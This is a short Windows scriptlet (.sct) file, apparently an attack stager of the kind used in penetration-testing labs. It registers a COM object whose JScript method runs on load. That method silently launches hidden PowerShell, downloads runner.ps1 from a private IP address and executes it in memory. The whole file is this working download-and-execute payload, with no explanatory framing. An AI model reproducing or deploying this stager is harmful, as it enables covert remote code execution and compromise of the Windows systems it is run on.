<?XML version="1.0"?>
<scriptlet>
<registration
    description="Desc"
    progid="Progid"
    version="0"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
</registration>

<public>
    <method name="Exec"></method>
</public>

<script language="JScript">
<![CDATA[
      function Exec() {
          var shell = new ActiveXObject("WScript.Shell");
          var cmd = 'powershell -w hidden -nop -c "IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.45.227/runner.ps1\')"';
          shell.Run(cmd, 0, false);
      }

    // Automatically call the Exec method when the scriptlet is loaded
    Exec();
]]>
</script>
</scriptlet>
